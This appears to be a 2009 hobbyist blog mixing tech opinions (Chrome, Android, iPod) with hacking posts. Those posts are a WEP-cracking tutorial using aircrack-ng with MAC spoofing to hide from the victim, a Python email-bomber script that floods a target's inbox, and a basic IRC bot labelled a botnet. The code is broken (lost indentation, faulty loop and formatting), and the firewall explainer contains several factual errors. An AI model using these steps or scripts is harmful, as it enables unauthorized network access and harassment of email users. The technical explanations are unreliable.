Tuesday, December 8, 2009

Google Chrome New (beta)

Google chrome for linux and mac is out. Although this is a beta version it works exceptionally good and if I must say so is faster then Mozilla and is definitely faster then Internet explorer. Google chrome in my opinion is the best web browser Out so go get it mac,linux and sad to say the noobs who are still on windows. http://www.google.com/chrome

Saturday, December 5, 2009

Ubuntu pics





This is my add or remove programs screen,my screen saver, and the famous linux terminal! Just wanted you all who are still on pc or any other linux distribution to get a fill for ubuntu linux

I-pod

So im getting my first ipod touch for Christmas. I have to say that I was debating on rather I should get that or the zune hd. And my decision was the i-pod. As of now I only have one problem with the i-pod and it's that it wont run flash. Now I know some windows fans are puzzled as to why so I'll list three reasons as to why I made this decision.


1.Safari loads faster then windows mobile
2.More apps for the i-pod
3. You can do multiple things at once

1.Does not run flash

Saturday, November 21, 2009

Good blog

Ok people time for an update. I have recently been following this blog http://ftechhelp.blogspot.com/ Run by a cool blogger named Vinncet. He also supports mac and Linux like me=p . If you support either os make sure to subscribe here and also to his blog! until next time," Happy Coding!"

Thursday, October 22, 2009

android os Good or Bad?

There has been a lot of talk this past month about the android os. First off if you don't know what this is I will try to briefly explain it to you as best as I can. A lot of mobile smart phones run off of windows mobile or Linux. The android which has been made by Google, is open source just like Linux and is powerd by it also. The androids main competitors will be the I-phone and windows based smart-phones also AT&T since it is sold through Verizon and also T-mobile. It's os for mobile phones has received good reviews and was just recently released as the official os for the G1 by Google. The problem is that Google wanted to take it further so they decided to partner with Acer and created an android Os for pcs. Now the main problem is that the android should have just stayed and competed for their place for mobile phones. But making it into a full Os is doomed for horrific results.

1). The android was originally designed for mobile phones as said above.

2). There are limited features for it and most of the features resolve around having an android based mobile phone.

3). Google and phones just don't mix.

Now there are some good qualities with this os.

1). First off it is open source meaning you can custom it.

2). You can also make apps and contribute to the open source community.

3.) It runs pretty fast and it boots up in 18 seconds and it only takes one second to power it off.

I like the android for a os for mobile phones but taking it and molding it into something it isn't could have tremendous repercussions for Google. I predict that it won't sell good even though it is being sold with the Acer and will still have windows xp. The androids blog is here http://www.android.com/ . Comment post whatever :P

Tuesday, October 13, 2009

Linux wep cracking

Written By Socrates, Lol no pictures But it is detailed and should work.


This is for educational purposes. I take no responsibility for the actions of others.:p

Ok this tutorial will teach you how to crack a wep using ubuntu 9.04 and aircrack-ng.

Follow these commands first open up a new terminal and type sudo apt-get install macchanger. Wait for this to finish downloading and installing, afterwards download sudo apt-get install aircrack-ng in the same terminal.

Alright for the rest of this tutorial you need to disable networking. After that is done open up a terminal and type:

Make sure to include your wireless cards name (mine was wlan0) yours might be different.

sudo airmon-ng stop wlan0

sudo ifconfig wlan0 down

Next you will need to change your maccadress so you whoever you are hacking doesn't know you are you Tongue. You can do this by typing:

sudo macchanger --mac 00:11:22:33:44:55 wlan0
Your mac address should say faked.

Next type

sudo airmon-ng start wlan0

Find the network and make sure it is WEP then locate the bssid and copy it also note the channel number or ch. Mine was 6 but yours might be different.

then type

sudo airodump-ng wlan0

you should see the networks name and it's data. Next open up new terminal and type:

sudo airodump-ng -c [channel] -w [filename] --bssid [bssid] wlan0

you should see something association successful with a smiley face. You need this to work!

next type:

sudo aireplay-ng -1 0 -a [bssid] -h [fake mac] mon0

sudo aireplay-ng -3 -b [bssid] -h [fake mac] wlan0

Now you should see a lot of packets. You will need a certain amount of these before you can crack the pass.

After you reach about 5,000 packets or higher type aircrack-ng -b [bssid] [filename]-01.cap


If the injection was successful it will say decrypted 100% and then the pass. If the pass is 78:90:798:789: then it would be 7890798798 with no semicolons . Tongue

Thursday, October 8, 2009

Chaosforums!

CF security is now up!! The purpose of this site is to educate others and also support and advertise http://chaosforums.tk/ . It's a good site ranned by a coder named Chaos. Make sure to drop by. 8-)

Basics of Firewalls

-Firewalls-
Ok most hackers should know how to get around and tweak a windows based firewall. If not this is the right guide. First you will learn what

TCP
UDP
MTU
Packet Filtering
Port

What those listed above are. Ok lets get started. The whole point of a firewall is to protect the computer from incoming packets that could be harmful.It also encrypts out going packets and decrypts incoming. A packet is a bit of data that is carrying other data to a destination. They also check outgoing packets.Firewalls can help keep Malware of your pc, trojans and viruses if configured right.

Ok TCP stands for (Transmission Control Protocol ) TCP deals with how data is put into packets.It is what is mostly used to when packets are sent somewhere. TCP doesn't care what the packet contains it just makes sure it gets to it's destination.This is also more reliable when visiting a website, it is more stable then UDP. TCP drops packets but not as much as UDP

UDP (User Datagram Protocol) This is used at times when TCP isn't the best bet.Your PC would use this when you are watching a video say like on youtube. If your computer was to use this instead of TCP when visiting a site, you would never reach that site because UDP is not as stable as TCP. IT constantly drops packets, which is ok under the right circumstances.

MTU (Maximum Transmission Unit) This is used when a firewall is receiving to many packets of data. Say a firewall can only accept packets up to sizes of 250. Well say your packet is 200 bits of data. The firewall would automatically block this.The packet has two options either drop or split into smaller packets.UDP would probably drop the packets. If it splits it would split the packets evenly so all your packets size would decrease to 50. This wouldn't be a problem because when they get to their destination they automatically reform.This also makes the firewall work a lot harder. Constantly doing this would DDos the system,so this could be used for malicious intent.


Packet filtering
This is what all firewalls do. They check the packets heading, to make sure that the packet is headed to the right direction.It checks,for viruses, and trojans, Malware too. They are easy to bypass because they don't check the whole packet just the basics. This is a serious security issue, which could if not thoroughly checked could allow in a trojan or malware.

Port
These are used to allow packets to travel through, sort of like roads.They act as tunnels and can be breached a lot by hackers(hehehe) or exploited to carry in spoofed packets to the users cp. There is 65,535 ports that are used. Most of these are used to allow you web access etc. Port 80 is for http:// which is for websites.

Malicious Intents

Spoofing packets
This can be use to hijack packets and spoof or fake another cp's IP address. This can be used to activate a trojan on the system or sometimes start a DDos attack.

DDos (Distributive Denial Of Service)
You may have heard of this from sites like twitter, myspace and facebook frequently having it happen.This is used a lot to stop legitimate users from accessing a site. Works by flooding an IP with so many packets the MTU works harder.

Python email bomber

Eclipse had helped me code this when I was first starting off with python so thanks:)

Coded in python :P
import smtplib

f = input ('Please enter the sender of the email: ')
s = "smtp.gmail.com"
t = input ('Please enter the target: ')
p = input ('Please enter your Gmail password: ')
n = int(input ('Enter a random number '))
m = input ('What would you like for the Emails to say? ')
d = 0

print ("Here is what you put in:")
print ('Sender = ', f)
print ('Taget = ', t)
print ('Pass = ', p)
print ('Random Number = ', n)
print ('The emails will say: ', m)
print ('Our SMTP server will be:', s)
print ('Starting now.....')

smtpserver = smtplib.SMTP("smtp.gmail.com",587)
smtpserver.ehlo()
smtpserver.starttls()
smtpserver.ehlo
smtpserver.login(f, p)
header = ('To:' + t + '\n' + 'From: ' + f + '\n' + 'Subject:MyTest \n')

print (header)
msg = header + '\n Prelim testing \n\n'

while (d < n):
smtpserver.sendmail(f, t, m)


print ('Total sent: ', d)

d = d + 1

smtpserver.close()

IRC BOTNET

This simply connects a bot to a IRC room and stays their. Coded in python. Enjoy!:P


import socket,sys
irc_host = "sites name goes here"
irc_port = 6667
irc_channel = "(irc chatrooms name)"
irc_nick = ""


try:
irc_sock = socket.socket ( socket.AF_INET,socket.SOCK_STREAM)
irc_sock.connect ((irc_host,irc_port))
except:
print("[Socrates]Error: Could not connect to IRC; Host: %s Port: %i")

else:
print ("[Socrates]Connected to the IRC; Host: %s Port: %i")

irc_sock.send (( "nick %s \r\n") %(irc_nick))
print (" Setting bot nick to %s")%(irc_nick)
irc_sock.send (("USER %s 8 * :X\r\n") % (irc_nick))
print (" Setting User")
irc_sock.send (( "Join %s \r\n") % (irc_channel))
print ("Joining channel %s") % (irc_channel)

while True:
recv = irc_sock.recv(5000)
if recv.find ( ' PING' ) <=5000:
irc_sock.send('PONG' + recv.split()[1] + '\r\n')
irc_sock.send(("MSG %s :sup %s!\n") %(irc_channel))